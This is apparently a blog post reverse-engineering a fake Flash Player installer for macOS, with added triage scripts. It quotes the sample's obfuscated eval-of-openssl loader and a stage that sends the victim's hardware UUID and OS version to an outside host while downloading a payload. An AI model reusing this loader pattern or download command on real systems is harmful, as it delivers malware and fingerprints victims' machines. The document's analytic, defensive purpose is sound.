A friend's goof!
The incident started with an inattentive friend who had just downloaded and installed a fake Adobe Flash Player update on his MacBook. The culprit? While he was browsing izap4u.com (a French website that offers compilations of funny videos), the site showed a malicious pop-up urging him to update Adobe Flash Player. It's not the case anymore. I do hope it's over.
Clean up the mess
He reached out to me for help and I quickly advised him to install Malwarebytes for Mac. This software lets you easily scan for and remove malware, and it works great on macOS. He installed it and launched a threat scan; as expected, the scan found the malware and helped my friend erase it.
I was curious about this adware, so I downloaded it too in order to reverse it! At first glance it is a small .dmg (only ~108 KB). It contains a "Player_XXX.app" that uses the classic Flash Player icon.
Here is the package structure:
/Volumes/Player ❯ tree Player_061.app
Player_061.app
└── Contents
    ├── Info.plist
    ├── MacOS
    │   └── hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q
    ├── Resources
    │   ├── app4862950061.icns
    │   └── enc
    └── _CodeSignature
        ├── CodeDirectory
        ├── CodeRequirements
        ├── CodeRequirements-1
        ├── CodeResources
        └── CodeSignature

4 directories, 9 files
Here we will look at two files:
❯ file Player_061.app/Contents/MacOS/hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q
Player_061.app/Contents/MacOS/hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q: Bourne-Again shell script text executable, ASCII text

❯ cat Player_061.app/Contents/MacOS/hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q
#!/bin/bash
cd "$(dirname "$BASH_SOURCE")"
fileDir="$(dirname "$(pwd -P)")"
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:4862950061 <"$fileDir"/Resources/enc)"

❯ file Player_061.app/Contents/Resources/enc
Player_061.app/Contents/Resources/enc: ASCII text
So we have a bash script and a text file. The enc file is not "base64 encrypted": it is AES ciphertext that has merely been base64-encoded so that it survives as plain ASCII inside the bundle.
The hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q bash script tells us exactly how to decrypt the enc file: AES-256-CBC, no salt, with the password 4862950061 hard-coded in the script. The same command, run by hand:
openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:4862950061 </tmp/Player/Player_061.app/Contents/Resources/enc
Since the key is derived from a password that ships inside the bundle, this "encryption" only hides the next stage from a casual look and from naive static scanners; it protects nothing against an analyst. One caveat when reproducing this: openssl enc derives the key and IV from the password with a digest whose default changed from MD5 to SHA-256 in OpenSSL 1.1.0, so if the output is garbage on your machine, add -md md5 (or -md sha256) to match the OpenSSL build the authors used.
You can see the result here (spoiler: it's a bash script too!):
What does this script do?
This bash script relies heavily on eval. But what does eval do? If you type help eval inside a Terminal on macOS you will get:
eval: eval [arg ...]
    Read ARGs as input to the shell and execute the resulting command(s).
Pretty easy, right? eval concatenates all its arguments and executes the result as a command. That is what makes the loader nasty: whatever openssl decrypts is fed straight to the shell, so the real code never touches the disk in clear.
We don't want to install this adware, so we replace the last eval with echo, which only prints the script instead of running it. Save the result as decrypted_enc.sh, run chmod +x decrypted_enc.sh and then execute it.
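To make the two steps above repeatable (is the "binary" a script at all, and what does the eval feed to the shell?), here is an added example that is not part of the original post. It rebuilds the sample's bundle layout in a scratch directory with a harmless, constructed stage 2 (the real decrypted stage is not reproduced), then triages it the safe way: the main executable is classified by its magic bytes, the eval-of-openssl pattern is flagged, and the next stage is decrypted and printed by re-issuing the openssl command ourselves rather than by running anything from the sample. The loader file name "loader" and the stage contents are assumptions; the cipher options and the password 4862950061 are the ones from the sample.

```shell
#!/bin/bash
# Added example, not code from the original post. It rebuilds the sample's
# layout with a harmless constructed "stage 2" and triages it without
# ever running the loader's eval. Bundle/file names mirror the post;
# the password 4862950061 is the one hard-coded in the sample's loader.

# 1. Build a look-alike bundle in a scratch directory (constructed test data).
build_fake_bundle() {
  local root="$1" pass="$2"
  local app="$root/Player_061.app/Contents"
  mkdir -p "$app/MacOS" "$app/Resources"
  # The hidden next stage. The real sample's stage 2 is NOT reproduced here.
  printf '%s\n' '#!/bin/bash' 'echo "stage 2 would run here"' > "$root/stage2.sh"
  # Same cipher, salt-less key derivation and password style as the sample.
  openssl enc -base64 -aes-256-cbc -nosalt -pass "pass:$pass" \
    < "$root/stage2.sh" > "$app/Resources/enc" 2>/dev/null
  # Loader stub: a bash script where a Mach-O binary would normally sit.
  cat > "$app/MacOS/loader" <<EOF
#!/bin/bash
cd "\$(dirname "\$BASH_SOURCE")"
fileDir="\$(dirname "\$(pwd -P)")"
eval "\$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:$pass <"\$fileDir"/Resources/enc)"
EOF
  chmod +x "$app/MacOS/loader"
}

# 2. Is the main executable a real Mach-O or a script? Mach-O files start
#    with FEEDFACE / FEEDFACF / CAFEBABE (either byte order); a shell
#    dropper starts with "#!" (0x23 0x21).
exe_kind() {
  local magic
  magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
  case "$magic" in
    feedface|cefaedfe|feedfacf|cffaedfe|cafebabe|bebafeca) echo macho ;;
    2321*) echo script ;;
    *) echo unknown ;;
  esac
}

# 3. Static indicator: eval of an openssl-decrypted blob is the whole trick.
has_eval_decrypt() {
  grep -Eq 'eval[[:space:]]+"?\$\(.*openssl[[:space:]]+enc[^)]*-d' "$1"
}

# 4. Recover the next stage the way the loader would, but print it instead
#    of eval'ing it. Only the password is taken from the loader; the openssl
#    command line is re-issued by us, so nothing from the sample is executed.
dump_next_stage() {
  local loader="$1" contents pass
  contents=$(cd "$(dirname "$loader")/.." && pwd -P)
  pass=$(sed -n 's/.*-pass pass:\([^ ]*\) .*/\1/p' "$loader")
  [ -n "$pass" ] || { echo "no -pass pass:... in loader" >&2; return 1; }
  openssl enc -base64 -d -aes-256-cbc -nosalt -pass "pass:$pass" \
    < "$contents/Resources/enc" 2>/dev/null
}

# Stand-alone demo.
triage_demo() {
  local root loader
  root=$(mktemp -d)
  build_fake_bundle "$root" 4862950061
  loader="$root/Player_061.app/Contents/MacOS/loader"
  echo "main executable: $(exe_kind "$loader")"
  has_eval_decrypt "$loader" && echo "indicator: eval of openssl-decrypted blob"
  echo "--- next stage (printed, not executed) ---"
  dump_next_stage "$loader"
  rm -rf "$root"
}
triage_demo
```

Point dump_next_stage at a real bundle's Contents/MacOS script and it prints stage 2 without touching eval; if the output is garbage, the key-derivation digest differs between your OpenSSL and the builder's (see the -md note above).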
We obtain this (spoiler: it's again a bash script! Script-ception never ends):
Prepare the script
This script has a lot of variables, but they are not prefixed by export, because that is pointless inside an eval (the evaluated code runs in the calling shell). So we slightly modify it to make it easy to trace outside an eval: we add export before every variable, and remove >/dev/null 2>&1, which silences stdout and stderr; we also add -v to the curl command for debugging purposes.
We also want to catch the value of every variable in this script, so we add an echo interesting_var=$interesting_var after each assignment.
Finally, we want to print script lines as they are read, to follow along while it's running; set -v allows us to do this.
One last thing: we definitely don't want to install the adware, so we comment out the last two lines, which open the malicious file and make it executable, with #.
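The manual edits just described can be applied mechanically, which is handy when the dropper is re-fetched and the next stage changes. The following is an added example, not the post's own instrumented script: instrument_stage rewrites a decrypted stage into a traced, non-destructive copy (set -v after the shebang, redirections to /dev/null removed, curl made verbose, every top-level assignment exported and echoed to stderr, and the chmod/open lines commented out). The miniature stage it runs on is constructed from the excerpts shown further down; the real stage 3 is not reproduced, and the host example.invalid is a placeholder.

```shell
#!/bin/bash
# Added example, not the post's own script: turn a decrypted stage into a
# traced, non-destructive copy, automating the manual edits described above.
# The sample stage below is constructed; the real stage 3 is not reproduced.

# Rewrite rules, in order:
#  - add "set -v" after the shebang so each line is echoed before it runs
#  - drop ">/dev/null 2>&1" so the stage's own stdout/stderr become visible
#  - make curl verbose (-v) to see the request and response headers
#  - export every top-level assignment and echo "name=value" to stderr
#  - comment out "open ..." and "chmod +x ..." so the payload is never launched
instrument_stage() {
  sed -e '1a\
set -v' \
      -e 's/[[:space:]]*>\/dev\/null 2>&1//g' \
      -e 's/^\([[:space:]]*\)curl /\1curl -v /' \
      -e 's/^\([A-Za-z_][A-Za-z0-9_]*\)=\(.*\)$/export \1=\2; echo "\1=$\1" >\&2/' \
      -e 's/^\([[:space:]]*\)open /\1#open /' \
      -e 's/^\([[:space:]]*\)chmod +x /\1#chmod +x /' \
      "$1" > "$2"
}

# Constructed miniature of the dropper's last stage (same shape as the post's
# excerpts: version/url variables, a curl download, chmod + open of the payload).
write_sample_stage() {
  printf '%s\n' \
    '#!/bin/bash' \
    'os_version="10.14.1"' \
    'tmp_path="/tmp/payload.zip"' \
    'url="http://example.invalid/sd/?o=$os_version&b=4862950061"' \
    'curl -f0L "$url" >>$tmp_path >/dev/null 2>&1' \
    'chmod +x "$app_dir/Player.app/Contents/MacOS/Player"' \
    'open "$app_dir/Player.app"' > "$1"
}

# Stand-alone demo: show the traced copy instead of running it.
instrument_demo() {
  local d
  d=$(mktemp -d)
  write_sample_stage "$d/stage3.sh"
  instrument_stage "$d/stage3.sh" "$d/stage3_traced.sh"
  cat "$d/stage3_traced.sh"
  rm -rf "$d"
}
instrument_demo
```

The variable echoes go to stderr so they do not mix with whatever the stage itself writes to stdout. Review the traced copy before running it: the rewrite only neutralises the chmod/open lines it knows about, so any other side effect (writing to LaunchAgents, for example) still has to be commented out by hand.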
Here is the final script ready to launch:
(What does this script do?)²
After this we can launch the script to better understand how it works.
Here are the interesting outputs:
sw_vers -productVersion
os_version=10.14.1
A Universally Unique IDentifier (UUID) for the session (session_guid), and the hardware identifier IOPlatformUUID read from the I/O Registry (I have anonymized mine):
echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]'
machine_id=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
The URL to download the malware; it is fetched with curl (-f fails on HTTP errors instead of saving the error page, -0 forces HTTP/1.0, -L follows redirects):
url="http://api.binarysources.com/sd/?c=_pl_GJybQ==&u=$machine_id&s=$session_guid&o=$os_version&b=4862950061"
curl -v -f0L "$url" >>$tmp_path
Note that 4862950061 turns up everywhere in this sample: it is the AES password of the loader, the name of the icon file (app4862950061.icns), the b= parameter of this request and the tail of the zip password below, so it looks like a build or campaign identifier.
The .zip downloaded from $url seems to always have the same password:
unzip_password="16005926849404862950061"
unzip -P "$unzip_password" "$tmp_path" -d "$app_dir"
This script uses curl to download the malware and, via the query string, reports the macOS version, the session UUID and the IOPlatformUUID of the victim to the server.
I think the malware is generated thanks to this: it aims to be unique so it can dupe Apple Gatekeeper.
When I attempted to download the malware the URL didn't work anymore, so I couldn't continue the reverse engineering.
curl -v -f0L "$url" >>$tmp_path
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 18.104.22.168...
* TCP_NODELAY set
* Connected to api.binarysources.com (22.214.171.124) port 80 (#0)
> GET /sd/?c=_pl_GJybQ==&u=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX&s=05D6295D-5A6E-43EE-BA60-D602682FAA43&o=10.14.1&b=4862950061 HTTP/1.0
> Host: api.binarysources.com
> User-Agent: curl/7.62.0
> Accept: */*
>
* The requested URL returned error: 404 Not Found
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Closing connection 0
curl: (22) The requested URL returned error: 404 Not Found
Be vigilant when you surf the internet, and don't type your password when you are not sure an installer is safe.